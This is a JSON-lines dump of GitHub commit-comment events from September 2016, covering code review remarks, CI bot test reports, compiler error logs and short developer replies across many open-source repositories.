{"id":"4505822077","type":"CommitCommentEvent","actor":{"login":"Ridermansb"},"repo":{"name":"vuejs-templates/webpack-simple"},"payload":{"comment":{"id":18872606,"position":null,"line":null,"path":null,"commit_id":"65d5e9dcc4da899d737b063667b3eb3a1344b461","created_at":"2016-09-01T23:57:04Z","updated_at":"2016-09-01T23:57:04Z","body":"I can not understand why updating to 2.0. There is a [template for the 2.0](https://github.com/vuejs-templates/webpack-simple-2.0)!\r\n\r\nThe main plugin route [is not compatible with 2.0](https://github.com/vuejs/vue-router#vue-router----) .. how can I use 1.0?"}},"created_at":"2016-09-01T23:57:04Z"}
{"id":"4505824255","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"JuliaQuant/MarketData.jl"},"payload":{"comment":{"id":18872612,"position":null,"line":null,"path":null,"commit_id":"2b36390820e77938c28b1a7fb4fd11825367e67c","created_at":"2016-09-01T23:57:43Z","updated_at":"2016-09-01T23:57:43Z","body":"Don't think this was the issue"}},"created_at":"2016-09-01T23:57:43Z"}
{"id":"4505828084","type":"CommitCommentEvent","actor":{"login":"diegorodriguesvieira"},"repo":{"name":"TwistedScorpio/OTHire"},"payload":{"comment":{"id":18872622,"position":null,"line":null,"path":null,"commit_id":"8e567570eec5a2d4570a376bb7431ee280d36513","created_at":"2016-09-01T23:58:49Z","updated_at":"2016-09-01T23:58:49Z","body":"I do not know if it's a bug but from what I tested here, a monster removed a ladder on their way"}},"created_at":"2016-09-01T23:58:49Z"}
{"id":"4500188967","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18857188,"position":null,"line":null,"path":null,"commit_id":"f371039a9d302d83a153f201cf4394779799f9db","created_at":"2016-09-01T03:00:19Z","updated_at":"2016-09-01T03:00:19Z","body":"Related to: backdrop/backdrop-issues#2110 "}},"created_at":"2016-09-01T03:00:19Z"}
{"id":"4500190627","type":"CommitCommentEvent","actor":{"login":"mpyw"},"repo":{"name":"mpyw/php-hyper-builtin-server"},"payload":{"comment":{"id":18857189,"position":9,"line":51,"path":"src/BuiltinServerFactory.php","commit_id":"1b24008f2b779b6d2e773b29c6041f6a23de1af4","created_at":"2016-09-01T03:00:53Z","updated_at":"2016-09-01T03:00:53Z","body":"It works!"}},"created_at":"2016-09-01T03:00:53Z"}
{"id":"4500198876","type":"CommitCommentEvent","actor":{"login":"ctrueden"},"repo":{"name":"maven-nar/nar-maven-plugin"},"payload":{"comment":{"id":18857195,"position":null,"line":null,"path":null,"commit_id":"8906f94f29d0194deae7ef68d000d43214226171","created_at":"2016-09-01T03:03:57Z","updated_at":"2016-09-01T03:03:57Z","body":"@markBowman Thanks. But is that currently maintained anywhere? It's another project from @duns, and hasn't been updated for almost 6 years. So it must depend on the old version of NAR..."}},"created_at":"2016-09-01T03:03:57Z"}
{"id":"4500206149","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18857204,"position":null,"line":null,"path":null,"commit_id":"ee02cc0befbab1dc6207e8dda177184f9d5750b3","created_at":"2016-09-01T03:06:45Z","updated_at":"2016-09-01T03:06:45Z","body":"113835831-Source-Temp-Not-Reporting (mjwitte) - x86_64-MacOS-10.9-clang: OK (2326 of 2327 tests passed, 24 test warnings)\n\n * 25 tests had: AUD diffs.\n * 25 tests had: RDD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee02cc0befbab1dc6207e8dda177184f9d5750b3-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee02cc0befbab1dc6207e8dda177184f9d5750b3-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-01T03:06:45Z"}
{"id":"4500209033","type":"CommitCommentEvent","actor":{"login":"LegendAI"},"repo":{"name":"LegendAI/WebChart"},"payload":{"comment":{"id":18857210,"position":null,"line":null,"path":null,"commit_id":"a1369e23a3d5f2093ec9964af39e1ef7b807b2cf","created_at":"2016-09-01T03:07:49Z","updated_at":"2016-09-01T03:07:49Z","body":"dasd 啊"}},"created_at":"2016-09-01T03:07:49Z"}
{"id":"4500210820","type":"CommitCommentEvent","actor":{"login":"nicksigei"},"repo":{"name":"nicksigei/Advanced-S-W"},"payload":{"comment":{"id":18857212,"position":null,"line":null,"path":null,"commit_id":"a7e8543e42174ed69ac0f873d098aa3d2d72e013","created_at":"2016-09-01T03:08:30Z","updated_at":"2016-09-01T03:08:30Z","body":"\r\n![screenshot of analytics graph](https://cloud.githubusercontent.com/assets/21245142/18154082/7061bac2-6fc7-11e6-8c58-105c280df236.PNG)\r\n"}},"created_at":"2016-09-01T03:08:30Z"}
{"id":"4500211014","type":"CommitCommentEvent","actor":{"login":"stanhu"},"repo":{"name":"middleman/middleman"},"payload":{"comment":{"id":18857213,"position":null,"line":null,"path":null,"commit_id":"086c49a387dd09e8bf55bac94e0cbf1740420ee4","created_at":"2016-09-01T03:08:34Z","updated_at":"2016-09-01T03:08:34Z","body":"At GitLab, we use Middleman for everything on our Web site, including our blog. Speeding up our blog deploys is critical; it takes 15+ minutes for Middleman to rebuild our entire site. We're very interested in helping making incremental builds supported. Is there anything we can do to help?"}},"created_at":"2016-09-01T03:08:34Z"}
{"id":"4500212632","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18857214,"position":null,"line":null,"path":null,"commit_id":"450e7482dc5174a57d91aaa295157c448e7bff8f","created_at":"2016-09-01T03:09:11Z","updated_at":"2016-09-01T03:09:11Z","body":"Related to: backdrop/backdrop-issues#1361 "}},"created_at":"2016-09-01T03:09:11Z"}
{"id":"4500218434","type":"CommitCommentEvent","actor":{"login":"borring"},"repo":{"name":"neovim/neovim"},"payload":{"comment":{"id":18857222,"position":null,"line":null,"path":null,"commit_id":"af161dcfb88f2a6886f9e0a7fbfe24cd58c3f658","created_at":"2016-09-01T03:11:23Z","updated_at":"2016-09-01T03:11:23Z","body":"Running make in `runtime/doc` fails now:\r\n\r\n```\r\nmake: *** No rule to make target 'tags', needed by 'tags.ref'.  Stop.\r\n```"}},"created_at":"2016-09-01T03:11:23Z"}
{"id":"4500221185","type":"CommitCommentEvent","actor":{"login":"sirotama"},"repo":{"name":"Moffkey/Moff"},"payload":{"comment":{"id":18857226,"position":null,"line":null,"path":null,"commit_id":"718cd994d672ea81a440f8774dcd655df9b24c18","created_at":"2016-09-01T03:12:29Z","updated_at":"2016-09-01T03:12:29Z","body":"👍 good job\r\n"}},"created_at":"2016-09-01T03:12:29Z"}
{"id":"4500223171","type":"CommitCommentEvent","actor":{"login":"latelan"},"repo":{"name":"latelan/bilive"},"payload":{"comment":{"id":18857231,"position":null,"line":null,"path":null,"commit_id":"cd798691104003c640d5cbac8779551b280bdb2a","created_at":"2016-09-01T03:13:16Z","updated_at":"2016-09-01T03:13:16Z","body":"哈哈，看见的早"}},"created_at":"2016-09-01T03:13:16Z"}
{"id":"4500223288","type":"CommitCommentEvent","actor":{"login":"keks93"},"repo":{"name":"Bauuuuu/android_device_zte_nx512j"},"payload":{"comment":{"id":18857233,"position":null,"line":null,"path":null,"commit_id":"930a95eb1f0258cc91b20a5f997f5b5f52e1faca","created_at":"2016-09-01T03:13:19Z","updated_at":"2016-09-01T03:13:19Z","body":"#if 0 обязателен? помоему и без него работать должно "}},"created_at":"2016-09-01T03:13:19Z"}
{"id":"4500225304","type":"CommitCommentEvent","actor":{"login":"keks93"},"repo":{"name":"Bauuuuu/android_device_zte_nx512j"},"payload":{"comment":{"id":18857236,"position":null,"line":null,"path":null,"commit_id":"930a95eb1f0258cc91b20a5f997f5b5f52e1faca","created_at":"2016-09-01T03:14:07Z","updated_at":"2016-09-01T03:14:07Z","body":"supported scene modes можно тоже убрать "}},"created_at":"2016-09-01T03:14:07Z"}
{"id":"4500229389","type":"CommitCommentEvent","actor":{"login":"Sn0wCrack"},"repo":{"name":"Sn0wCrack/ExHentai-Archive"},"payload":{"comment":{"id":18857246,"position":null,"line":null,"path":null,"commit_id":"3211ef12957ba4b4e18f3d60024c86b8f1fd83ed","created_at":"2016-09-01T03:15:37Z","updated_at":"2016-09-01T03:15:37Z","body":"You wouldn't be able to redownload the gallery and it would cause a lot of problems, same is true for regularly deleted galleries that aren't wiped with Task_Cleanup.\r\nI could do something about it, but I feel it's high effort, low reward sorta deal, since you did have to delete the gallery in the first place."}},"created_at":"2016-09-01T03:15:37Z"}
{"id":"4500229702","type":"CommitCommentEvent","actor":{"login":"latelan"},"repo":{"name":"latelan/bilive"},"payload":{"comment":{"id":18857247,"position":null,"line":null,"path":null,"commit_id":"cd798691104003c640d5cbac8779551b280bdb2a","created_at":"2016-09-01T03:15:45Z","updated_at":"2016-09-01T03:15:45Z","body":"@BROBIRD 哈哈，看见的早"}},"created_at":"2016-09-01T03:15:45Z"}
{"id":"4500230212","type":"CommitCommentEvent","actor":{"login":"mcifani"},"repo":{"name":"steemit/steemit.com"},"payload":{"comment":{"id":18857250,"position":null,"line":null,"path":null,"commit_id":"9f0e6c626846c43df0097266e57f28e604112377","created_at":"2016-09-01T03:15:57Z","updated_at":"2016-09-01T03:15:57Z","body":"<img width=\"143\" alt=\"screen shot 2016-08-31 at 8 15 41 pm\" src=\"https://cloud.githubusercontent.com/assets/1158463/18154221/b7a27698-6fb7-11e6-8809-e8416e35fc41.png\">\r\n<img width=\"155\" alt=\"screen shot 2016-08-31 at 8 15 30 pm\" src=\"https://cloud.githubusercontent.com/assets/1158463/18154222/b7a397da-6fb7-11e6-9189-e415a553cf20.png\">\r\n"}},"created_at":"2016-09-01T03:15:57Z"}
{"id":"4500230857","type":"CommitCommentEvent","actor":{"login":"niksedk"},"repo":{"name":"SubtitleEdit/subtitleedit"},"payload":{"comment":{"id":18857251,"position":13,"line":2165,"path":"libse/Language.cs","commit_id":"294b3f646e9a274204052ca78898bf54aaa07d19","created_at":"2016-09-01T03:16:10Z","updated_at":"2016-09-01T03:16:10Z","body":"Ah yes, thx :)"}},"created_at":"2016-09-01T03:16:10Z"}
{"id":"4500230917","type":"CommitCommentEvent","actor":{"login":"treffynnon"},"repo":{"name":"lumoslabs/sqlstyle.guide"},"payload":{"comment":{"id":18857252,"position":4,"line":3,"path":"README.md","commit_id":"0495c287af7cbfdbf3e7a0439eec6ca03a5db39d","created_at":"2016-09-01T03:16:11Z","updated_at":"2016-09-01T03:16:11Z","body":"Shouldn't this be http://engineering.lumosity.com/sqlstyle.guide/?"}},"created_at":"2016-09-01T03:16:11Z"}
{"id":"4500233019","type":"CommitCommentEvent","actor":{"login":"jordanh"},"repo":{"name":"ParabolInc/action"},"payload":{"comment":{"id":18857255,"position":15,"line":13,"path":"src/universal/modules/meeting/helpers/makePhaseItemFactory.js","commit_id":"1daa9e416bbc14d04b2890379a23598bce696222","created_at":"2016-09-01T03:17:03Z","updated_at":"2016-09-01T03:17:03Z","body":"I'm not sure this is doing what you intended. If nextPhase is `undefined` in the mutation, then `moveMeeting` will not ever updated the `meetingPhase` field."}},"created_at":"2016-09-01T03:17:03Z"}
{"id":"4500233724","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/vault-analytics"},"payload":{"comment":{"id":18857257,"position":null,"line":null,"path":null,"commit_id":"5a819ac0b0bea4f7f67b9b5ea7771d1f3c0db09c","created_at":"2016-09-01T03:17:19Z","updated_at":"2016-09-01T03:17:19Z","body":"oh, I thought it was already in there. What was I seeing that was 1.3.4?"}},"created_at":"2016-09-01T03:17:19Z"}
{"id":"4500236473","type":"CommitCommentEvent","actor":{"login":"gberginc"},"repo":{"name":"emc-advanced-dev/unik"},"payload":{"comment":{"id":18857263,"position":84,"line":84,"path":"pkg/providers/openstack/openstack_auth.go","commit_id":"b10a9b05a34edbde4c7bf49c565fcb65eb49e3bb","created_at":"2016-09-01T03:18:17Z","updated_at":"2016-09-01T03:18:17Z","body":"This I would rename. It is unexported symbol in openstack package. Just use getHandle. Not sure if \"handle\" is the correct term, though :)"}},"created_at":"2016-09-01T03:18:17Z"}
{"id":"4500238813","type":"CommitCommentEvent","actor":{"login":"paulproteus"},"repo":{"name":"awans/mark"},"payload":{"comment":{"id":18857270,"position":5,"line":45,"path":"feed/http.go","commit_id":"4fd6c70981c572b95a57190a2146f1d98d34465a","created_at":"2016-09-01T03:19:09Z","updated_at":"2016-09-01T03:19:09Z","body":"Yay!"}},"created_at":"2016-09-01T03:19:09Z"}
{"id":"4500246864","type":"CommitCommentEvent","actor":{"login":"PeterCha90"},"repo":{"name":"PeterCha90/ML_Shiny"},"payload":{"comment":{"id":18857283,"position":null,"line":null,"path":null,"commit_id":"bb802ead362c62cfbf279942fedcc604380bedd6","created_at":"2016-09-01T03:21:51Z","updated_at":"2016-09-01T03:21:51Z","body":"ui.R"}},"created_at":"2016-09-01T03:21:51Z"}
{"id":"4500248508","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18857284,"position":null,"line":null,"path":null,"commit_id":"e38ea8882941ebf45a48a84e82af37117e68ce1b","created_at":"2016-09-01T03:22:31Z","updated_at":"2016-09-01T03:22:31Z","body":"FixCentroidForNonconvex (JasonGlazer) - i386-Windows-7-VisualStudio-12: OK (2332 of 2333 tests passed, 0 test warnings)\n\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: SSZ big diffs.\n * 1 test had: ZSZ big diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e38ea8882941ebf45a48a84e82af37117e68ce1b-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e38ea8882941ebf45a48a84e82af37117e68ce1b-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-01T03:22:31Z"}
{"id":"4500248962","type":"CommitCommentEvent","actor":{"login":"aldenml"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":18857286,"position":null,"line":null,"path":null,"commit_id":"fb1cab555eadcbc3f870ac7910a57d5d32f76e2e","created_at":"2016-09-01T03:22:41Z","updated_at":"2016-09-01T03:22:41Z","body":"wow, I don't have that version in my SDK manager that I maintain updated, but it works"}},"created_at":"2016-09-01T03:22:41Z"}
{"id":"4500255834","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18857300,"position":null,"line":null,"path":null,"commit_id":"34cf667ef26cea90003b336fbb2fbf9e2580bbee","created_at":"2016-09-01T03:25:24Z","updated_at":"2016-09-01T03:25:24Z","body":"113835831-Source-Temp-Not-Reporting (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1187 of 1187 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-34cf667ef26cea90003b336fbb2fbf9e2580bbee-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-34cf667ef26cea90003b336fbb2fbf9e2580bbee-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-34cf667ef26cea90003b336fbb2fbf9e2580bbee-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-35.98%25-green.svg)</a>\n"}},"created_at":"2016-09-01T03:25:24Z"}
{"id":"4500258043","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18857309,"position":null,"line":null,"path":null,"commit_id":"34cf667ef26cea90003b336fbb2fbf9e2580bbee","created_at":"2016-09-01T03:26:16Z","updated_at":"2016-09-01T03:26:16Z","body":"113835831-Source-Temp-Not-Reporting (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-34cf667ef26cea90003b336fbb2fbf9e2580bbee-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-01T03:26:16Z"}
{"id":"4500259886","type":"CommitCommentEvent","actor":{"login":"Moorviper"},"repo":{"name":"Moorviper/hopglass"},"payload":{"comment":{"id":18857328,"position":null,"line":null,"path":null,"commit_id":"6f5648f13b2db42f604cadf121fb16f693f0eae9","created_at":"2016-09-01T03:26:56Z","updated_at":"2016-09-01T03:26:56Z","body":"defekt '' -> \"\""}},"created_at":"2016-09-01T03:26:56Z"}
{"id":"4500260570","type":"CommitCommentEvent","actor":{"login":"aldenml"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":18857329,"position":null,"line":null,"path":null,"commit_id":"fb1cab555eadcbc3f870ac7910a57d5d32f76e2e","created_at":"2016-09-01T03:27:13Z","updated_at":"2016-09-01T03:27:13Z","body":"What's the problem with the 24 version?"}},"created_at":"2016-09-01T03:27:13Z"}
{"id":"4500261232","type":"CommitCommentEvent","actor":{"login":"mattkrick"},"repo":{"name":"ParabolInc/action"},"payload":{"comment":{"id":18857330,"position":15,"line":13,"path":"src/universal/modules/meeting/helpers/makePhaseItemFactory.js","commit_id":"1daa9e416bbc14d04b2890379a23598bce696222","created_at":"2016-09-01T03:27:26Z","updated_at":"2016-09-01T03:27:26Z","body":"the logic gets hairy so it's very possible that i goofed something up.\r\nwhat you describe sounds good, meetingPhase should only update if nextPhase is included & nextPhase is phaseOrder(meetingPhase)+1. Can you give me a failing case? \r\n"}},"created_at":"2016-09-01T03:27:26Z"}
{"id":"4500268396","type":"CommitCommentEvent","actor":{"login":"Jackey65536"},"repo":{"name":"Jackey65536/SomeShells"},"payload":{"comment":{"id":18857347,"position":null,"line":null,"path":null,"commit_id":"a6e44b9293ff7ebf785c42553c50e74321d666bd","created_at":"2016-09-01T03:30:16Z","updated_at":"2016-09-01T03:30:16Z","body":"to find two dir different files"}},"created_at":"2016-09-01T03:30:16Z"}
{"id":"4500268921","type":"CommitCommentEvent","actor":{"login":"mmoutenot"},"repo":{"name":"prescottprue/redux-firebasev3"},"payload":{"comment":{"id":18857348,"position":4,"line":15,"path":"source/actions.js","commit_id":"744d210baed675442e113cabb0ea5c1104f67537","created_at":"2016-09-01T03:30:26Z","updated_at":"2016-09-01T03:30:26Z","body":"What are you using `capitalize` for?"}},"created_at":"2016-09-01T03:30:26Z"}
{"id":"4500269680","type":"CommitCommentEvent","actor":{"login":"kevin3-black"},"repo":{"name":"lasa/website"},"payload":{"comment":{"id":18857350,"position":null,"line":null,"path":null,"commit_id":"2600316d60671caf209cca44fa9bf46a53ef551e","created_at":"2016-09-01T03:30:44Z","updated_at":"2016-09-01T03:30:44Z","body":"The comic sans is temporary while I look for an appropriate font."}},"created_at":"2016-09-01T03:30:44Z"}
{"id":"4500271037","type":"CommitCommentEvent","actor":{"login":"EliasCai"},"repo":{"name":"jbradberry/ultimate_tictactoe"},"payload":{"comment":{"id":18857353,"position":null,"line":null,"path":null,"commit_id":"b00253bb4f05df54e4d6f7e4f7cc94df064077eb","created_at":"2016-09-01T03:31:18Z","updated_at":"2016-09-01T03:31:18Z","body":"@jbradberry i got it ,thanks a lot!"}},"created_at":"2016-09-01T03:31:18Z"}
{"id":"4500271495","type":"CommitCommentEvent","actor":{"login":"Cypher1"},"repo":{"name":"Karl-Krauth/COMP6771-tests"},"payload":{"comment":{"id":18857354,"position":31,"line":31,"path":"asst2/MattTests.cpp","commit_id":"dd27dbbe6987ab62d4cad706f132774c82b2110b","created_at":"2016-09-01T03:31:29Z","updated_at":"2016-09-01T03:31:29Z","body":"g++ -std=c++14 -Wall -Werror -O2 -fsanitize=address -c -o AccessTests.o AccessTests.cpp\r\ng++ -std=c++14 -Wall -Werror -O2 -fsanitize=address -c -o ConstructorTests.o ConstructorTests.cpp\r\ng++ -std=c++14 -Wall -Werror -O2 -fsanitize=address -c -o EuclideanVector.o EuclideanVector.cpp\r\ng++ -std=c++14 -Wall -Werror -O2 -fsanitize=address -c -o EuclideanVectorTester.o EuclideanVectorTester.cpp\r\ng++ -std=c++14 -Wall -Werror -O2 -fsanitize=address -c -o MattTests.o MattTests.cpp\r\nMattTests.cpp:31:8: error: explicitly moving variable of type 'evec::EuclideanVector' to itself [-Werror,-Wself-move]\r\n    v1 = std::move(v1);\r\n    ~~ ^           ~~\r\nMattTests.cpp:83:15: error: moving a temporary object prevents copy elision [-Werror,-Wpessimizing-move]\r\n    auto v3 = std::move(v2 * 2);\r\n              ^\r\nMattTests.cpp:83:15: note: remove std::move call here\r\n    auto v3 = std::move(v2 * 2);\r\n              ^~~~~~~~~~      ~\r\n2 errors generated.\r\nmake: *** [MattTests.o] Error 1\r\n./test.sh: line 18: ./EuclideanVectorTester: No such file or directory\r\nrm *o EuclideanVectorTester\r\nrm: EuclideanVectorTester: No such file or directory\r\nmake: *** [clean] Error 1\r\n\r\nIs this clang only?"}},"created_at":"2016-09-01T03:31:29Z"}
{"id":"4500273103","type":"CommitCommentEvent","actor":{"login":"gberginc"},"repo":{"name":"emc-advanced-dev/unik"},"payload":{"comment":{"id":18857363,"position":33,"line":33,"path":"pkg/providers/openstack/delete_instance.go","commit_id":"e703f8e34dc1906a298d30dfd6534297ce39cda8","created_at":"2016-09-01T03:32:10Z","updated_at":"2016-09-01T03:32:10Z","body":"In al25 for example you return \"failed to...\" message, while here you just explain what you were trying to do. I think error messages should be consistent."}},"created_at":"2016-09-01T03:32:10Z"}
{"id":"4500274723","type":"CommitCommentEvent","actor":{"login":"gembes"},"repo":{"name":"ralsina/devicenzo"},"payload":{"comment":{"id":18857366,"position":null,"line":null,"path":null,"commit_id":"fbbb75f9360f9707ff796be2256da7b5ff2aad34","created_at":"2016-09-01T03:32:50Z","updated_at":"2016-09-01T03:32:50Z","body":"progress = lambda self, received, total:\r\n                                           ^\r\nSyntaxError: invalid syntax\r\nCompilation failed.\r\n"}},"created_at":"2016-09-01T03:32:50Z"}
{"id":"4500274928","type":"CommitCommentEvent","actor":{"login":"covers1624"},"repo":{"name":"TheCBProject/CodeChickenLib"},"payload":{"comment":{"id":18857367,"position":null,"line":null,"path":null,"commit_id":"a6d5577da74d409dd91dea5d9179190d1da81aa3","created_at":"2016-09-01T03:32:55Z","updated_at":"2016-09-01T03:32:55Z","body":":+1: "}},"created_at":"2016-09-01T03:32:55Z"}
{"id":"4500276815","type":"CommitCommentEvent","actor":{"login":"jordanh"},"repo":{"name":"ParabolInc/action"},"payload":{"comment":{"id":18857370,"position":15,"line":13,"path":"src/universal/modules/meeting/helpers/makePhaseItemFactory.js","commit_id":"1daa9e416bbc14d04b2890379a23598bce696222","created_at":"2016-09-01T03:33:36Z","updated_at":"2016-09-01T03:33:36Z","body":"I think the intent behind this change was good, but I don't think the `moveMeeting` mutation is currently setup to handle when `nextPhase` is `undefined`. `meetingPhaseItem` never gets updated as it currently stands.\r\n\r\nI'm looking into it!"}},"created_at":"2016-09-01T03:33:36Z"}
{"id":"4500276947","type":"CommitCommentEvent","actor":{"login":"raphamorim"},"repo":{"name":"raphamorim/raphamorim.github.com"},"payload":{"comment":{"id":18857371,"position":null,"line":null,"path":null,"commit_id":"c5f3d1691390fd9816d0277ff3b4cd9bb0bb0736","created_at":"2016-09-01T03:33:40Z","updated_at":"2016-09-01T03:33:40Z","body":"Thanks @jaydson for reviewing this :D"}},"created_at":"2016-09-01T03:33:40Z"}
{"id":"4500278297","type":"CommitCommentEvent","actor":{"login":"gberginc"},"repo":{"name":"emc-advanced-dev/unik"},"payload":{"comment":{"id":18857374,"position":5,"line":4,"path":"pkg/providers/openstack/list_images.go","commit_id":"e703f8e34dc1906a298d30dfd6534297ce39cda8","created_at":"2016-09-01T03:34:12Z","updated_at":"2016-09-01T03:34:12Z","body":"I'd remove the comment"}},"created_at":"2016-09-01T03:34:12Z"}
{"id":"4500278315","type":"CommitCommentEvent","actor":{"login":"Js41637"},"repo":{"name":"DuckieTV/SceneNameExceptions"},"payload":{"comment":{"id":18857375,"position":null,"line":null,"path":null,"commit_id":"2709e5255204e5a1efd42499d9010ba666e20e74","created_at":"2016-09-01T03:34:12Z","updated_at":"2016-09-01T03:34:12Z","body":"Block still requires AU for me, at least for Pirate Bay, not using AU returns no results."}},"created_at":"2016-09-01T03:34:12Z"}
{"id":"4500279272","type":"CommitCommentEvent","actor":{"login":"jaydson"},"repo":{"name":"raphamorim/raphamorim.github.com"},"payload":{"comment":{"id":18857377,"position":null,"line":null,"path":null,"commit_id":"c5f3d1691390fd9816d0277ff3b4cd9bb0bb0736","created_at":"2016-09-01T03:34:35Z","updated_at":"2016-09-01T03:34:35Z","body":"<3"}},"created_at":"2016-09-01T03:34:35Z"}
{"id":"4500279477","type":"CommitCommentEvent","actor":{"login":"jordanh"},"repo":{"name":"ParabolInc/action"},"payload":{"comment":{"id":18857378,"position":15,"line":13,"path":"src/universal/modules/meeting/helpers/makePhaseItemFactory.js","commit_id":"1daa9e416bbc14d04b2890379a23598bce696222","created_at":"2016-09-01T03:34:39Z","updated_at":"2016-09-01T03:34:39Z","body":"Right now Check-in is broken. When you advance past the last card, we go into an infinite loop."}},"created_at":"2016-09-01T03:34:39Z"}
{"id":"4500280382","type":"CommitCommentEvent","actor":{"login":"Alan-R"},"repo":{"name":"wildpeaks/vagrant-xenial64-boilerplate"},"payload":{"comment":{"id":18857381,"position":null,"line":null,"path":null,"commit_id":"e69c665a648bd24cda919605b67ceb1e71ef28b9","created_at":"2016-09-01T03:35:01Z","updated_at":"2016-09-01T03:35:01Z","body":"FWIW:  @cecilemuller That other issue (neo4j/neo4j#7052) was related only to Docker. It doesn't occur outside of Docker. Not sure why."}},"created_at":"2016-09-01T03:35:01Z"}
{"id":"4500282369","type":"CommitCommentEvent","actor":{"login":"jordanh"},"repo":{"name":"ParabolInc/action"},"payload":{"comment":{"id":18857390,"position":15,"line":13,"path":"src/universal/modules/meeting/helpers/makePhaseItemFactory.js","commit_id":"1daa9e416bbc14d04b2890379a23598bce696222","created_at":"2016-09-01T03:35:47Z","updated_at":"2016-09-01T03:35:47Z","body":"Stand-by, I should have a change to the mutation I'd like your eyes on."}},"created_at":"2016-09-01T03:35:47Z"}
{"id":"4500293642","type":"CommitCommentEvent","actor":{"login":"gasolin"},"repo":{"name":"mozilla/gecko-dev"},"payload":{"comment":{"id":18857432,"position":18,"line":243,"path":"devtools/client/sourceeditor/editor.js","commit_id":"4060bbdcb1cba0197085ce5aef66b889a23b5fd1","created_at":"2016-09-01T03:40:20Z","updated_at":"2016-09-01T03:40:20Z","body":"@TatumCreative  do we need assign `this.config.autocompleteOpts.cssProperties = this.config.cssProperties;` here as well?"}},"created_at":"2016-09-01T03:40:20Z"}
{"id":"4500297015","type":"CommitCommentEvent","actor":{"login":"FrederickChan"},"repo":{"name":"php-fusion/PHP-Fusion"},"payload":{"comment":{"id":18857443,"position":null,"line":null,"path":null,"commit_id":"f0409af707d0dde0fc66fe117a3091e03aeed00f","created_at":"2016-09-01T03:41:44Z","updated_at":"2016-09-01T03:41:44Z","body":"Yes, I already git back."}},"created_at":"2016-09-01T03:41:44Z"}
{"id":"4500299220","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":18857446,"position":null,"line":null,"path":null,"commit_id":"788a32b0aa655831e334f3d3b5cbe08e6f3f7cbe","created_at":"2016-09-01T03:42:40Z","updated_at":"2016-09-01T03:42:40Z","body":"I Marco, I would let the stc test run to completion, just to have the results documented. I will not go for LTC and will not open a PR. It looks like it will fail anyway."}},"created_at":"2016-09-01T03:42:40Z"}
{"id":"4500300472","type":"CommitCommentEvent","actor":{"login":"niksedk"},"repo":{"name":"SubtitleEdit/subtitleedit"},"payload":{"comment":{"id":18857448,"position":null,"line":null,"path":null,"commit_id":"f6e917367921d0f459c7b021996d77979e83a8b6","created_at":"2016-09-01T03:43:10Z","updated_at":"2016-09-01T03:43:10Z","body":"Also, \"show only differences\" combined with \"Only show differences in text\" does not work anymore when lines are deleted"}},"created_at":"2016-09-01T03:43:10Z"}
